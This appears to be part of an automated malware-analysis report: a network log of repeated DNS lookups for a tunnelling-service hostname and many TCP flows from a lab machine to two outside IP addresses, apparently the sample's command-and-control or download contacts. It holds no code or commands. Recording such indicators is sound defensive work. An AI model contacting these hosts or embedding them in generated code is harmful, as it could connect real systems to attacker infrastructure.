Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
